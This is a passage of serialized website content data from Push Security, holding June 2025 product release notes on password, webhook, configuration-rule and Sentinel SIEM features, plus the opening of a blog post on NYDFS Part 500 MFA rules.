tab.",{"data":65806,"content":65809,"nodeType":312},{"target":65807},{"sys":65808},{"id":25101,"type":317,"linkType":318},[],{"data":65811,"content":65812,"nodeType":169},{},[65813],{"data":65814,"marks":65815,"value":65651,"nodeType":173},{},[],{"data":65817,"content":65818,"nodeType":178},{},[65819,65823,65827],{"data":65820,"marks":65821,"value":65822,"nodeType":173},{},[],"Prompt your employees to change an insecure password using Push’s new in-browser guardrail, ",{"data":65824,"marks":65825,"value":2578,"nodeType":173},{},[65826],{"type":370},{"data":65828,"marks":65829,"value":2340,"nodeType":173},{},[],{"data":65831,"content":65832,"nodeType":178},{},[65833],{"data":65834,"marks":65835,"value":65836,"nodeType":173},{},[],"You can select which password security issues you want to remediate, and which apps you want to target using the configuration rules for this control. Then, when Push observes a password issue, it will automatically display a banner to end-users prompting them to change their password.",{"data":65838,"content":65842,"nodeType":312},{"target":65839},{"sys":65840},{"id":65841,"type":317,"linkType":318},"6ZcsdzYPxLAE1K170mQPHE",[],{"data":65844,"content":65845,"nodeType":178},{},[65846,65849,65857],{"data":65847,"marks":65848,"value":37,"nodeType":173},{},[],{"data":65850,"content":65853,"nodeType":1698},{"target":65851},{"sys":65852},{"id":2442,"type":317,"linkType":318},[65854],{"data":65855,"marks":65856,"value":18605,"nodeType":173},{},[],{"data":65858,"marks":65859,"value":37,"nodeType":173},{},[],{"data":65861,"content":65862,"nodeType":169},{},[65863],{"data":65864,"marks":65865,"value":65661,"nodeType":173},{},[],{"data":65867,"content":65868,"nodeType":178},{},[65869,65873,65878],{"data":65870,"marks":65871,"value":65872,"nodeType":173},{},[],"If you have employees using multiple email addresses, you can ",{"data":65874,"marks":65875,"value":65877,"nodeType":173},{},[65876],{"type":370},"now merge those records in the Push platform",{"data":65879,"marks":65880,"value":65881,"nodeType":173},{},[]," so they can be treated as a single employee. ",{"data":65883,"content":65884,"nodeType":178},{},[65885],{"data":65886,"marks":65887,"value":65888,"nodeType":173},{},[],"A common use case for merging employee records is when you have employees with a user account and an administrator account. By merging records in cases like this, you can resolve incorrect shared account findings and correct your license usage so only the primary employee record consumes a license. ",{"data":65890,"content":65891,"nodeType":178},{},[65892],{"data":65893,"marks":65894,"value":65895,"nodeType":173},{},[],"You can also merge records programmatically via the Push REST API. This is helpful if you have a predictable pattern for usernames you're mapping.",{"data":65897,"content":65901,"nodeType":312},{"target":65898},{"sys":65899},{"id":65900,"type":317,"linkType":318},"3xcEqhSUZ1VmZTsgSOS4xH",[],{"data":65903,"content":65904,"nodeType":178},{},[65905,65908,65917],{"data":65906,"marks":65907,"value":37,"nodeType":173},{},[],{"data":65909,"content":65913,"nodeType":1698},{"target":65910},{"sys":65911},{"id":65912,"type":317,"linkType":318},"3RIMjhmhJcHC2V7Lkrhvj2",[65914],{"data":65915,"marks":65916,"value":18605,"nodeType":173},{},[],{"data":65918,"marks":65919,"value":37,"nodeType":173},{},[],{"data":65921,"content":65922,"nodeType":169},{},[65923],{"data":65924,"marks":65925,"value":65671,"nodeType":173},{},[],{"data":65927,"content":65928,"nodeType":178},{},[65929,65932,65937],{"data":65930,"marks":65931,"value":65284,"nodeType":173},{},[],{"data":65933,"marks":65934,"value":65936,"nodeType":173},{},[65935],{"type":370},"select which events you want when creating a webhook",{"data":65938,"marks":65939,"value":65940,"nodeType":173},{},[]," in the Push platform. For example, if you want to build an automation around specific Push events or send only Push detection alerts to your SIEM, you can elect to send just those events to your configured destinations. ",{"data":65942,"content":65943,"nodeType":178},{},[65944],{"data":65945,"marks":65946,"value":65947,"nodeType":173},{},[],"You can select which events you want to consume when configuring a new webhook via the Push admin console.",{"data":65949,"content":65953,"nodeType":312},{"target":65950},{"sys":65951},{"id":65952,"type":317,"linkType":318},"755nABuK9KGdHHwWNqDtmS",[],{"data":65955,"content":65956,"nodeType":178},{},[65957,65960,65967],{"data":65958,"marks":65959,"value":37,"nodeType":173},{},[],{"data":65961,"content":65963,"nodeType":186},{"uri":65962},"https://pushsecurity.redoc.ly/webhooks-v1",[65964],{"data":65965,"marks":65966,"value":18605,"nodeType":173},{},[],{"data":65968,"marks":65969,"value":37,"nodeType":173},{},[],{"data":65971,"content":65972,"nodeType":169},{},[65973],{"data":65974,"marks":65975,"value":65681,"nodeType":173},{},[],{"data":65977,"content":65978,"nodeType":178},{},[65979,65983,65988,65992,65997,66000,66004],{"data":65980,"marks":65981,"value":65982,"nodeType":173},{},[],"We’re continuing to ",{"data":65984,"marks":65985,"value":65987,"nodeType":173},{},[65986],{"type":370},"add configuration rule capabilities to security controls",{"data":65989,"marks":65990,"value":65991,"nodeType":173},{},[]," in the Push platform, including for ",{"data":65993,"marks":65994,"value":65996,"nodeType":173},{},[65995],{"type":370},"phishing tool detection",{"data":65998,"marks":65999,"value":933,"nodeType":173},{},[],{"data":66001,"marks":66002,"value":2570,"nodeType":173},{},[66003],{"type":370},{"data":66005,"marks":66006,"value":2340,"nodeType":173},{},[],{"data":66008,"content":66009,"nodeType":178},{},[66010,66014,66018],{"data":66011,"marks":66012,"value":66013,"nodeType":173},{},[],"With these config rules, you can scope a control to specific employees or employee groups, and carve out exemptions if you like. You can also set the control to apply to specific apps, or set the ",{"data":66015,"marks":66016,"value":19371,"nodeType":173},{},[66017],{"type":370},{"data":66019,"marks":66020,"value":66021,"nodeType":173},{},[]," (e.g. Monitor, Warn, or Block), where applicable.",{"data":66023,"content":66027,"nodeType":312},{"target":66024},{"sys":66025},{"id":66026,"type":317,"linkType":318},"2eKYcSet4tkd6UEffzdaaa",[],{"data":66029,"content":66030,"nodeType":178},{},[66031,66034,66041],{"data":66032,"marks":66033,"value":37,"nodeType":173},{},[],{"data":66035,"content":66037,"nodeType":186},{"uri":66036},"/help/10121/#how-to-create-a-configuration-rule",[66038],{"data":66039,"marks":66040,"value":18605,"nodeType":173},{},[],{"data":66042,"marks":66043,"value":37,"nodeType":173},{},[],{"data":66045,"content":66046,"nodeType":169},{},[66047],{"data":66048,"marks":66049,"value":65691,"nodeType":173},{},[],{"data":66051,"content":66052,"nodeType":178},{},[66053,66057,66061],{"data":66054,"marks":66055,"value":66056,"nodeType":173},{},[],"Push now offers a Microsoft Sentinel integration to make it easier to send Push data to your Sentinel SIEM. You can start setting up your integration by going to ",{"data":66058,"marks":66059,"value":65573,"nodeType":173},{},[66060],{"type":370},{"data":66062,"marks":66063,"value":66064,"nodeType":173},{},[]," in the Push admin console and selecting the Sentinel tile.",{"data":66066,"content":66070,"nodeType":312},{"target":66067},{"sys":66068},{"id":66069,"type":317,"linkType":318},"5l5TIPvbOoNgauV7gUj7fy",[],{"data":66072,"content":66073,"nodeType":178},{},[66074],{"data":66075,"marks":66076,"value":37,"nodeType":173},{},[],"Product release: June 2025","Here’s what’s new on the Push platform for June 2025.","2025-06-09T00:00:00.000Z","product-release-june-2025",{"items":66082},[66083],{"sys":66084,"name":18399},{"id":18398},{"items":66086},[66087],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":66088},{"url":19129},{"items":66090},[66091],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":66092},{"url":19129},{"json":66094,"links":66718},{"data":66095,"content":66096,"nodeType":165},{},[66097,66103,66169,66175,66181,66201,66221,66251,66256,66273,66279,66285,66291,66318,66323,66340,66346,66359,66365,66385,66391,66397,66417,66430,66435,66441,66447,66460,66466,66514,66520,66525,66542,66548,66561,66567,66588,66608,66614,66620,66712],{"data":66098,"content":66099,"nodeType":169},{},[66100],{"data":66101,"marks":66102,"value":18415,"nodeType":173},{},[],{"data":66104,"content":66105,"nodeType":250},{},[66106,66115,66124,66133,66142,66151,66160],{"data":66107,"content":66108,"nodeType":254},{},[66109],{"data":66110,"content":66111,"nodeType":178},{},[66112],{"data":66113,"marks":66114,"value":18428,"nodeType":173},{},[],{"data":66116,"content":66117,"nodeType":254},{},[66118],{"data":66119,"content":66120,"nodeType":178},{},[66121],{"data":66122,"marks":66123,"value":18438,"nodeType":173},{},[],{"data":66125,"content":66126,"nodeType":254},{},[66127],{"data":66128,"content":66129,"nodeType":178},{},[66130],{"data":66131,"marks":66132,"value":18448,"nodeType":173},{},[],{"data":66134,"content":66135,"nodeType":254},{},[66136],{"data":66137,"content":66138,"nodeType":178},{},[66139],{"data":66140,"marks":66141,"value":18458,"nodeType":173},{},[],{"data":66143,"content":66144,"nodeType":254},{},[66145],{"data":66146,"content":66147,"nodeType":178},{},[66148],{"data":66149,"marks":66150,"value":18468,"nodeType":173},{},[],{"data":66152,"content":66153,"nodeType":254},{},[66154],{"data":66155,"content":66156,"nodeType":178},{},[66157],{"data":66158,"marks":66159,"value":18478,"nodeType":173},{},[],{"data":66161,"content":66162,"nodeType":254},{},[66163],{"data":66164,"content":66165,"nodeType":178},{},[66166],{"data":66167,"marks":66168,"value":18488,"nodeType":173},{},[],{"data":66170,"content":66171,"nodeType":169},{},[66172],{"data":66173,"marks":66174,"value":18428,"nodeType":173},{},[],{"data":66176,"content":66177,"nodeType":178},{},[66178],{"data":66179,"marks":66180,"value":18501,"nodeType":173},{},[],{"data":66182,"content":66183,"nodeType":178},{},[66184,66187,66191,66194,66198],{"data":66185,"marks":66186,"value":18508,"nodeType":173},{},[],{"data":66188,"marks":66189,"value":18513,"nodeType":173},{},[66190],{"type":370},{"data":66192,"marks":66193,"value":18517,"nodeType":173},{},[],{"data":66195,"marks":66196,"value":18522,"nodeType":173},{},[66197],{"type":370},{"data":66199,"marks":66200,"value":18526,"nodeType":173},{},[],{"data":66202,"content":66203,"nodeType":178},{},[66204,66207,66211,66214,66218],{"data":66205,"marks":66206,"value":18533,"nodeType":173},{},[],{"data":66208,"marks":66209,"value":18538,"nodeType":173},{},[66210],{"type":370},{"data":66212,"marks":66213,"value":18542,"nodeType":173},{},[],{"data":66215,"marks":66216,"value":18547,"nodeType":173},{},[66217],{"type":370},{"data":66219,"marks":66220,"value":18551,"nodeType":173},{},[],{"data":66222,"content":66223,"nodeType":250},{},[66224,66233,66242],{"data":66225,"content":66226,"nodeType":254},{},[66227],{"data":66228,"content":66229,"nodeType":178},{},[66230],{"data":66231,"marks":66232,"value":18564,"nodeType":173},{},[],{"data":66234,"content":66235,"nodeType":254},{},[66236],{"data":66237,"content":66238,"nodeType":178},{},[66239],{"data":66240,"marks":66241,"value":18574,"nodeType":173},{},[],{"data":66243,"content":66244,"nodeType":254},{},[66245],{"data":66246,"content":66247,"nodeType":178},{},[66248],{"data":66249,"marks":66250,"value":18584,"nodeType":173},{},[],{"data":66252,"content":66255,"nodeType":312},{"target":66253},{"sys":66254},{"id":18589,"type":317,"linkType":318},[],{"data":66257,"content":66258,"nodeType":178},{},[66259,66262,66270],{"data":66260,"marks":66261,"value":37,"nodeType":173},{},[],{"data":66263,"content":66266,"nodeType":1698},{"target":66264},{"sys":66265},{"id":2489,"type":317,"linkType":318},[66267],{"data":66268,"marks":66269,"value":18605,"nodeType":173},{},[],{"data":66271,"marks":66272,"value":37,"nodeType":173},{},[],{"data":66274,"content":66275,"nodeType":169},{},[66276],{"data":66277,"marks":66278,"value":18438,"nodeType":173},{},[],{"data":66280,"content":66281,"nodeType":178},{},[66282],{"data":66283,"marks":66284,"value":18621,"nodeType":173},{},[],{"data":66286,"content":66287,"nodeType":178},{},[66288],{"data":66289,"marks":66290,"value":18628,"nodeType":173},{},[],{"data":66292,"content":66293,"nodeType":178},{},[66294,66297,66301,66304,66308,66311,66315],{"data":66295,"marks":66296,"value":18635,"nodeType":173},{},[],{"data":66298,"marks":66299,"value":18640,"nodeType":173},{},[66300],{"type":370},{"data":66302,"marks":66303,"value":18644,"nodeType":173},{},[],{"data":66305,"marks":66306,"value":18649,"nodeType":173},{},[66307],{"type":370},{"data":66309,"marks":66310,"value":18653,"nodeType":173},{},[],{"data":66312,"marks":66313,"value":2701,"nodeType":173},{},[66314],{"type":370},{"data":66316,"marks":66317,"value":18661,"nodeType":173},{},[],{"data":66319,"content":66322,"nodeType":312},{"target":66320},{"sys":66321},{"id":18666,"type":317,"linkType":318},[],{"data":66324,"content":66325,"nodeType":178},{},[66326,66329,66337],{"data":66327,"marks":66328,"value":37,"nodeType":173},{},[],{"data":66330,"content":66333,"nodeType":1698},{"target":66331},{"sys":66332},{"id":18678,"type":317,"linkType":318},[66334],{"data":66335,"marks":66336,"value":18605,"nodeType":173},{},[],{"data":66338,"marks":66339,"value":37,"nodeType":173},{},[],{"data":66341,"content":66342,"nodeType":169},{},[66343],{"data":66344,"marks":66345,"value":18448,"nodeType":173},{},[],{"data":66347,"content":66348,"nodeType":178},{},[66349,66352,66356],{"data":66350,"marks":66351,"value":18698,"nodeType":173},{},[],{"data":66353,"marks":66354,"value":18703,"nodeType":173},{},[66355],{"type":370},{"data":66357,"marks":66358,"value":18707,"nodeType":173},{},[],{"data":66360,"content":66361,"nodeType":178},{},[66362],{"data":66363,"marks":66364,"value":18714,"nodeType":173},{},[],{"data":66366,"content":66367,"nodeType":178},{},[66368,66371,66375,66378,66382],{"data":66369,"marks":66370,"value":18721,"nodeType":173},{},[],{"data":66372,"marks":66373,"value":18703,"nodeType":173},{},[66374],{"type":370},{"data":66376,"marks":66377,"value":18729,"nodeType":173},{},[],{"data":66379,"marks":66380,"value":18734,"nodeType":173},{},[66381],{"type":370},{"data":66383,"marks":66384,"value":18738,"nodeType":173},{},[],{"data":66386,"content":66387,"nodeType":169},{},[66388],{"data":66389,"marks":66390,"value":18745,"nodeType":173},{},[],{"data":66392,"content":66393,"nodeType":178},{},[66394],{"data":66395,"marks":66396,"value":18752,"nodeType":173},{},[],{"data":66398,"content":66399,"nodeType":178},{},[66400,66403,66407,66410,66414],{"data":66401,"marks":66402,"value":18759,"nodeType":173},{},[],{"data":66404,"marks":66405,"value":18513,"nodeType":173},{},[66406],{"type":370},{"data":66408,"marks":66409,"value":18767,"nodeType":173},{},[],{"data":66411,"marks":66412,"value":18772,"nodeType":173},{},[66413],{"type":370},{"data":66415,"marks":66416,"value":1477,"nodeType":173},{},[],{"data":66418,"content":66419,"nodeType":178},{},[66420,66423,66427],{"data":66421,"marks":66422,"value":18782,"nodeType":173},{},[],{"data":66424,"marks":66425,"value":18787,"nodeType":173},{},[66426],{"type":370},{"data":66428,"marks":66429,"value":18791,"nodeType":173},{},[],{"data":66431,"content":66434,"nodeType":312},{"target":66432},{"sys":66433},{"id":18796,"type":317,"linkType":318},[],{"data":66436,"content":66437,"nodeType":169},{},[66438],{"data":66439,"marks":66440,"value":18468,"nodeType":173},{},[],{"data":66442,"content":66443,"nodeType":178},{},[66444],{"data":66445,"marks":66446,"value":18810,"nodeType":173},{},[],{"data":66448,"content":66449,"nodeType":178},{},[66450,66453,66457],{"data":66451,"marks":66452,"value":18817,"nodeType":173},{},[],{"data":66454,"marks":66455,"value":18822,"nodeType":173},{},[66456],{"type":370},{"data":66458,"marks":66459,"value":18826,"nodeType":173},{},[],{"data":66461,"content":66462,"nodeType":178},{},[66463],{"data":66464,"marks":66465,"value":18833,"nodeType":173},{},[],{"data":66467,"content":66468,"nodeType":250},{},[66469,66478,66487,66496,66505],{"data":66470,"content":66471,"nodeType":254},{},[66472],{"data":66473,"content":66474,"nodeType":178},{},[66475],{"data":66476,"marks":66477,"value":18846,"nodeType":173},{},[],{"data":66479,"content":66480,"nodeType":254},{},[66481],{"data":66482,"content":66483,"nodeType":178},{},[66484],{"data":66485,"marks":66486,"value":18856,"nodeType":173},{},[],{"data":66488,"content":66489,"nodeType":254},{},[66490],{"data":66491,"content":66492,"nodeType":178},{},[66493],{"data":66494,"marks":66495,"value":18866,"nodeType":173},{},[],{"data":66497,"content":66498,"nodeType":254},{},[66499],{"data":66500,"content":66501,"nodeType":178},{},[66502],{"data":66503,"marks":66504,"value":18876,"nodeType":173},{},[],{"data":66506,"content":66507,"nodeType":254},{},[66508],{"data":66509,"content":66510,"nodeType":178},{},[66511],{"data":66512,"marks":66513,"value":18886,"nodeType":173},{},[],{"data":66515,"content":66516,"nodeType":178},{},[66517],{"data":66518,"marks":66519,"value":18893,"nodeType":173},{},[],{"data":66521,"content":66524,"nodeType":312},{"target":66522},{"sys":66523},{"id":18898,"type":317,"linkType":318},[],{"data":66526,"content":66527,"nodeType":178},{},[66528,66531,66539],{"data":66529,"marks":66530,"value":37,"nodeType":173},{},[],{"data":66532,"content":66535,"nodeType":1698},{"target":66533},{"sys":66534},{"id":18910,"type":317,"linkType":318},[66536],{"data":66537,"marks":66538,"value":18605,"nodeType":173},{},[],{"data":66540,"marks":66541,"value":37,"nodeType":173},{},[],{"data":66543,"content":66544,"nodeType":169},{},[66545],{"data":66546,"marks":66547,"value":18478,"nodeType":173},{},[],{"data":66549,"content":66550,"nodeType":178},{},[66551,66554,66558],{"data":66552,"marks":66553,"value":18930,"nodeType":173},{},[],{"data":66555,"marks":66556,"value":2718,"nodeType":173},{},[66557],{"type":370},{"data":66559,"marks":66560,"value":18938,"nodeType":173},{},[],{"data":66562,"content":66563,"nodeType":178},{},[66564],{"data":66565,"marks":66566,"value":18945,"nodeType":173},{},[],{"data":66568,"content":66569,"nodeType":250},{},[66570,66579],{"data":66571,"content":66572,"nodeType":254},{},[66573],{"data":66574,"content":66575,"nodeType":178},{},[66576],{"data":66577,"marks":66578,"value":18958,"nodeType":173},{},[],{"data":66580,"content":66581,"nodeType":254},{},[66582],{"data":66583,"content":66584,"nodeType":178},{},[66585],{"data":66586,"marks":66587,"value":18968,"nodeType":173},{},[],{"data":66589,"content":66590,"nodeType":178},{},[66591,66594,66598,66601,66605],{"data":66592,"marks":66593,"value":2785,"nodeType":173},{},[],{"data":66595,"marks":66596,"value":2718,"nodeType":173},{},[66597],{"type":370},{"data":66599,"marks":66600,"value":18982,"nodeType":173},{},[],{"data":66602,"marks":66603,"value":18987,"nodeType":173},{},[66604],{"type":370},{"data":66606,"marks":66607,"value":1477,"nodeType":173},{},[],{"data":66609,"content":66610,"nodeType":169},{},[66611],{"data":66612,"marks":66613,"value":18488,"nodeType":173},{},[],{"data":66615,"content":66616,"nodeType":178},{},[66617],{"data":66618,"marks":66619,"value":19003,"nodeType":173},{},[],{"data":66621,"content":66622,"nodeType":250},{},[66623,66654,66674,66683,66703],{"data":66624,"content":66625,"nodeType":254},{},[66626],{"data":66627,"content":66628,"nodeType":178},{},[66629,66632,66640,66643,66651],{"data":66630,"marks":66631,"value":19016,"nodeType":173},{},[],{"data":66633,"content":66636,"nodeType":1698},{"target":66634},{"sys":66635},{"id":19021,"type":317,"linkType":318},[66637],{"data":66638,"marks":66639,"value":19026,"nodeType":173},{},[],{"data":66641,"marks":66642,"value":933,"nodeType":173},{},[],{"data":66644,"content":66647,"nodeType":1698},{"target":66645},{"sys":66646},{"id":19034,"type":317,"linkType":318},[66648],{"data":66649,"marks":66650,"value":19039,"nodeType":173},{},[],{"data":66652,"marks":66653,"value":19043,"nodeType":173},{},[],{"data":66655,"content":66656,"nodeType":254},{},[66657],{"data":66658,"content":66659,"nodeType":178},{},[66660,66663,66671],{"data":66661,"marks":66662,"value":19053,"nodeType":173},{},[],{"data":66664,"content":66667,"nodeType":1698},{"target":66665},{"sys":66666},{"id":19058,"type":317,"linkType":318},[66668],{"data":66669,"marks":66670,"value":18605,"nodeType":173},{},[],{"data":66672,"marks":66673,"value":1477,"nodeType":173},{},[],{"data":66675,"content":66676,"nodeType":254},{},[66677],{"data":66678,"content":66679,"nodeType":178},{},[66680],{"data":66681,"marks":66682,"value":19075,"nodeType":173},{},[],{"data":66684,"content":66685,"nodeType":254},{},[66686],{"data":66687,"content":66688,"nodeType":178},{},[66689,66692,66700],{"data":66690,"marks":66691,"value":19085,"nodeType":173},{},[],{"data":66693,"content":66696,"nodeType":1698},{"target":66694},{"sys":66695},{"id":19090,"type":317,"linkType":318},[66697],{"data":66698,"marks":66699,"value":18605,"nodeType":173},{},[],{"data":66701,"marks":66702,"value":1477,"nodeType":173},{},[],{"data":66704,"content":66705,"nodeType":254},{},[66706],{"data":66707,"content":66708,"nodeType":178},{},[66709],{"data":66710,"marks":66711,"value":19107,"nodeType":173},{},[],{"data":66713,"content":66714,"nodeType":178},{},[66715],{"data":66716,"marks":66717,"value":37,"nodeType":173},{},[],{"entries":66719},{"inline":66720,"hyperlink":66721,"block":66752},[],[66722,66724,66726,66731,66736,66741,66747],{"sys":66723,"__typename":6655,"title":6696,"slug":6697,"articleId":6698},{"id":2489},{"sys":66725,"__typename":1528,"title":19633,"slug":19634},{"id":18678},{"sys":66727,"__typename":6655,"title":66728,"slug":66729,"articleId":66730},{"id":18910},"How does Push enrich detections with domain analysis data?","how-does-push-enrich-detections-with-domain-analysis-data",10136,{"sys":66732,"__typename":6655,"title":66733,"slug":66734,"articleId":66735},{"id":19021},"How do I create an exception for MFA findings?","how-do-i-create-an-exception-for-mfa-findings",10140,{"sys":66737,"__typename":6655,"title":66738,"slug":66739,"articleId":66740},{"id":19034},"How do I create an exception for reused password findings?","how-do-i-create-an-exception-for-reused-password-findings",10139,{"sys":66742,"__typename":66743,"linkedFromParent":118,"title":66744,"slug":66745,"audience":66746},{"id":19058},"DocumentationPage","Connect to SIEM or SOAR","connect-to-siem-or-soar","administrators",{"sys":66748,"__typename":6655,"title":66749,"slug":66750,"articleId":66751},{"id":19090},"Can I automatically remove licenses from inactive employees?","can-i-automatically-remove-licenses-from-inactive-employees",10143,[66753,66756,66762,66769],{"sys":66754,"__typename":5345,"title":46403,"caption":118,"layoutMode":118,"file":66755},{"id":18589},{"url":46405,"width":46406,"height":46407},{"sys":66757,"__typename":5345,"title":66758,"caption":118,"layoutMode":118,"file":66759},{"id":18666},"Clickfix detection example - KB 10141",{"url":66760,"width":66761,"height":65004},"https://images.ctfassets.net/y1cdw1ablpvd/5oWnKQFQqPdcsh93DCXji0/14d90366c354312349e5a664e2a0821a/clickfix_example_detection_20251009.png",1940,{"sys":66763,"__typename":5345,"title":66764,"caption":118,"layoutMode":118,"file":66765},{"id":18796},"My team - Settings - docs - Administering Push",{"url":66766,"width":66767,"height":66768},"https://images.ctfassets.net/y1cdw1ablpvd/6TN6jkKngLWXBSe80jte2k/05a740c839e8eae4989622f4c9c2198b/org_page_settings_20250929.png",1980,1232,{"sys":66770,"__typename":5345,"title":46372,"caption":118,"layoutMode":118,"file":66771},{"id":18898},{"url":46374,"width":46375,"height":46376},"content:blog:product-release-november-2025.json","blog/product-release-november-2025.json","blog/product-release-november-2025",{"_path":66776,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":66777,"ogImage":118,"summary":66779,"title":26711,"subtitle":118,"metaTitle":66790,"synopsis":26712,"hashTags":118,"publishedDate":26713,"slug":26714,"tagsCollection":66791,"content":66797,"relatedBlogPostsCollection":67322,"authorsCollection":68782,"_id":68786,"_type":5439,"_source":5440,"_file":68787,"_stem":68788,"_extension":5439},"/blog/what-the-expansion-of-nydfs-nycrr-part-500-means-for-mfa-compliance",{"id":26142,"publishedAt":66778},"2025-10-31T14:32:49.364Z",{"json":66780},{"data":66781,"content":66782,"nodeType":165},{},[66783],{"data":66784,"content":66785,"nodeType":178},{},[66786],{"data":66787,"marks":66788,"value":66789,"nodeType":173},{},[],"Earlier this month, New York State’s Department of Financial Services (NYDFS) levied $14 million in fines across 8 insurance companies under its cybersecurity regulation, NYCRR Part 500. From November 1st, the requirements for MFA and asset management are being tightened even further. Here’s what you need to know. ","What the expansion of NYCRR 500 means for MFA regulation",{"items":66792},[66793,66795],{"sys":66794,"name":26133},{"id":26132},{"sys":66796,"name":505},{"id":504},{"json":66798,"links":67294},{"data":66799,"content":66800,"nodeType":165},{},[66801,66817,66823,66829,66889,66925,66930,66936,66939,66946,66952,66994,67011,67017,67020,67027,67033,67063,67069,67076,67079,67086,67093,67099,67105,67112,67118,67124,67131,67137,67153,67158,67161,67168,67174,67190,67196,67202,67205,67212,67218,67224,67230,67236,67241,67244,67251,67257,67283,67288],{"data":66802,"content":66803,"nodeType":178},{},[66804,66807,66814],{"data":66805,"marks":66806,"value":5039,"nodeType":173},{},[],{"data":66808,"content":66809,"nodeType":186},{"uri":26155},[66810],{"data":66811,"marks":66812,"value":26161,"nodeType":173},{},[66813],{"type":194},{"data":66815,"marks":66816,"value":26165,"nodeType":173},{},[],{"data":66818,"content":66819,"nodeType":178},{},[66820],{"data":66821,"marks":66822,"value":26172,"nodeType":173},{},[],{"data":66824,"content":66825,"nodeType":178},{},[66826],{"data":66827,"marks":66828,"value":26179,"nodeType":173},{},[],{"data":66830,"content":66831,"nodeType":250},{},[66832,66851,66870],{"data":66833,"content":66834,"nodeType":254},{},[66835],{"data":66836,"content":66837,"nodeType":178},{},[66838,66841,66848],{"data":66839,"marks":66840,"value":37,"nodeType":173},{},[],{"data":66842,"content":66843,"nodeType":186},{"uri":26194},[66844],{"data":66845,"marks":66846,"value":26200,"nodeType":173},{},[66847],{"type":194},{"data":66849,"marks":66850,"value":26204,"nodeType":173},{},[],{"data":66852,"content":66853,"nodeType":254},{},[66854],{"data":66855,"content":66856,"nodeType":178},{},[66857,66860,66867],{"data":66858,"marks":66859,"value":37,"nodeType":173},{},[],{"data":66861,"content":66862,"nodeType":186},{"uri":26216},[66863],{"data":66864,"marks":66865,"value":26222,"nodeType":173},{},[66866],{"type":194},{"data":66868,"marks":66869,"value":26226,"nodeType":173},{},[],{"data":66871,"content":66872,"nodeType":254},{},[66873],{"data":66874,"content":66875,"nodeType":178},{},[66876,66879,66886],{"data":66877,"marks":66878,"value":37,"nodeType":173},{},[],{"data":66880,"content":66881,"nodeType":186},{"uri":26238},[66882],{"data":66883,"marks":66884,"value":26244,"nodeType":173},{},[66885],{"type":194},{"data":66887,"marks":66888,"value":26248,"nodeType":173},{},[],{"data":66890,"content":66891,"nodeType":178},{},[66892,66895,66902,66905,66912,66915,66922],{"data":66893,"marks":66894,"value":26255,"nodeType":173},{},[],{"data":66896,"content":66897,"nodeType":186},{"uri":26258},[66898],{"data":66899,"marks":66900,"value":26264,"nodeType":173},{},[66901],{"type":194},{"data":66903,"marks":66904,"value":933,"nodeType":173},{},[],{"data":66906,"content":66907,"nodeType":186},{"uri":26270},[66908],{"data":66909,"marks":66910,"value":26276,"nodeType":173},{},[66911],{"type":194},{"data":66913,"marks":66914,"value":26280,"nodeType":173},{},[],{"data":66916,"content":66917,"nodeType":186},{"uri":26283},[66918],{"data":66919,"marks":66920,"value":26289,"nodeType":173},{},[66921],{"type":194},{"data":66923,"marks":66924,"value":26293,"nodeType":173},{},[],{"data":66926,"content":66929,"nodeType":312},{"target":66927},{"sys":66928},{"id":26298,"type":317,"linkType":318},[],{"data":66931,"content":66932,"nodeType":178},{},[66933],{"data":66934,"marks":66935,"value":26306,"nodeType":173},{},[],{"data":66937,"content":66938,"nodeType":231},{},[],{"data":66940,"content":66941,"nodeType":169},{},[66942],{"data":66943,"marks":66944,"value":26317,"nodeType":173},{},[66945],{"type":370},{"data":66947,"content":66948,"nodeType":178},{},[66949],{"data":66950,"marks":66951,"value":26324,"nodeType":173},{},[],{"data":66953,"content":66954,"nodeType":250},{},[66955,66968,66981],{"data":66956,"content":66957,"nodeType":254},{},[66958],{"data":66959,"content":66960,"nodeType":178},{},[66961,66965],{"data":66962,"marks":66963,"value":26338,"nodeType":173},{},[66964],{"type":370},{"data":66966,"marks":66967,"value":26342,"nodeType":173},{},[],{"data":66969,"content":66970,"nodeType":254},{},[66971],{"data":66972,"content":66973,"nodeType":178},{},[66974,66978],{"data":66975,"marks":66976,"value":26353,"nodeType":173},{},[66977],{"type":370},{"data":66979,"marks":66980,"value":26357,"nodeType":173},{},[],{"data":66982,"content":66983,"nodeType":254},{},[66984],{"data":66985,"content":66986,"nodeType":178},{},[66987,66991],{"data":66988,"marks":66989,"value":26368,"nodeType":173},{},[66990],{"type":370},{"data":66992,"marks":66993,"value":26372,"nodeType":173},{},[],{"data":66995,"content":66996,"nodeType":178},{},[66997,67000,67004,67007],{"data":66998,"marks":66999,"value":26379,"nodeType":173},{},[],{"data":67001,"marks":67002,"value":26384,"nodeType":173},{},[67003],{"type":370},{"data":67005,"marks":67006,"value":26388,"nodeType":173},{},[],{"data":67008,"marks":67009,"value":26393,"nodeType":173},{},[67010],{"type":370},{"data":67012,"content":67013,"nodeType":178},{},[67014],{"data":67015,"marks":67016,"value":26400,"nodeType":173},{},[],{"data":67018,"content":67019,"nodeType":231},{},[],{"data":67021,"content":67022,"nodeType":169},{},[67023],{"data":67024,"marks":67025,"value":26411,"nodeType":173},{},[67026],{"type":370},{"data":67028,"content":67029,"nodeType":178},{},[67030],{"data":67031,"marks":67032,"value":26418,"nodeType":173},{},[],{"data":67034,"content":67035,"nodeType":250},{},[67036,67045,67054],{"data":67037,"content":67038,"nodeType":254},{},[67039],{"data":67040,"content":67041,"nodeType":178},{},[67042],{"data":67043,"marks":67044,"value":26431,"nodeType":173},{},[],{"data":67046,"content":67047,"nodeType":254},{},[67048],{"data":67049,"content":67050,"nodeType":178},{},[67051],{"data":67052,"marks":67053,"value":26441,"nodeType":173},{},[],{"data":67055,"content":67056,"nodeType":254},{},[67057],{"data":67058,"content":67059,"nodeType":178},{},[67060],{"data":67061,"marks":67062,"value":26451,"nodeType":173},{},[],{"data":67064,"content":67065,"nodeType":178},{},[67066],{"data":67067,"marks":67068,"value":26458,"nodeType":173},{},[],{"data":67070,"content":67071,"nodeType":178},{},[67072],{"data":67073,"marks":67074,"value":26466,"nodeType":173},{},[67075],{"type":370},{"data":67077,"content":67078,"nodeType":231},{},[],{"data":67080,"content":67081,"nodeType":169},{},[67082],{"data":67083,"marks":67084,"value":26477,"nodeType":173},{},[67085],{"type":370},{"data":67087,"content":67088,"nodeType":235},{},[67089],{"data":67090,"marks":67091,"value":26485,"nodeType":173},{},[67092],{"type":370},{"data":67094,"content":67095,"nodeType":178},{},[67096],{"data":6709